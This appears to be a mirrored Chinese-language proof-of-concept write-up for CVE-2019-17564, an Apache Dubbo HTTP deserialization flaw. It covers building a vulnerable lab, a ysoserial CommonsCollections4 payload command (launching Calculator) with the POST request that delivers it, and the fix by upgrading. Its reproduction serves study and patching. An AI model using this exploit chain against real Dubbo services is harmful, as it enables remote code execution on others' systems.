Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-17564 PoC — Apache Dubbo 安全漏洞

Source
https://github.com/fairyming/CVE-2019-17564
Associated Vulnerability
Title:Apache Dubbo 安全漏洞 (CVE-2019-17564)
Description:Apache Dubbo 2.7.0版本至2.7.4版本、2.6.0版本至2.6.7版本和2.5.x版本中存在安全漏洞,该漏洞源于Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当。攻击者可利用该漏洞执行任意代码。
Description
CVE-2019-17564:Apache Dubbo反序列化漏洞
Readme
# CVE-2019-17564:Apache Dubbo反序列化漏洞

# 0x00 简介
Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。

# 0x01 漏洞概述

 Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.。

# 0x02 影响版本

2.7.0 <= Apache Dubbo <= 2.7.4.1
2.6.0 <= Apache Dubbo <= 2.6.7
Apache Dubbo = 2.5.x

# 0x03 环境搭建

1、因为dubbo的启动需要依赖zookeeper,所以先安装zookeeper
```
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# 将conf目录下的zoo_sample.cfg改名为zoo.cfg
mv zoo_sample.cfg zoo.cfg
# 进入bin目录启动zookeeper
./zkServer.sh start
```

![WX20200222-171524@2x.png](images/1582362955556-247e5369-38bc-4dd7-9167-2896586087e0.png)

2、从GIthub上获取dubbo的项目,并修改pom.xml
```
git clone https://github.com/apache/dubbo-samples
# 进入到dubbo-samples-http目录中,修改pom.xml
vim pom.xml
```
将dubbo版本修改为有漏洞的版本
![WX20200222-172028@2x.png](images/1582363259817-67193fdc-b8d6-4e1e-b408-0f5c80395bd7.png)
添加依赖,导入一个可触发的gadgets,这边导入的是commons-collections4-4.0

```
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>
```

![WX20200222-172346@2x.png](images/1582363443997-28b7c2a6-6a30-4345-9e50-b597c89b3b4f.png)

3、mvn构建,启动dubbo

```
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
```

![WX20200222-172721@2x.png](images/1582363653872-922586de-47eb-4302-8824-46b3bccdab81.png)

# 0x04 漏洞利用
payload

```
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod
```
这边使用ysoserial生成paylaod

```
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
```

bp发包
![WX20200222-173202@2x.png](images/1582363937223-1aef120f-980c-44ef-b50b-4ea6c212aa64.png)

# 0x05 修复方式
1. 禁用HTTP协议
2. 及时升级到2.7.5及以上版本,相关链接:[https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5](https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5)

# 参考链接:

[https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html](https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html)
File Snapshot

 [4.0K]  /data/pocs/e7e8e808b047718f6cb2dac7781b5ab2a6ca85a0
├── [4.0K]  images
│   ├── [ 26K]  1582362955556-247e5369-38bc-4dd7-9167-2896586087e0.png
│   ├── [140K]  1582363259817-67193fdc-b8d6-4e1e-b408-0f5c80395bd7.png
│   ├── [146K]  1582363443997-28b7c2a6-6a30-4345-9e50-b597c89b3b4f.png
│   ├── [494K]  1582363653872-922586de-47eb-4302-8824-46b3bccdab81.png
│   └── [954K]  1582363937223-1aef120f-980c-44ef-b50b-4ea6c212aa64.png
└── [2.8K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.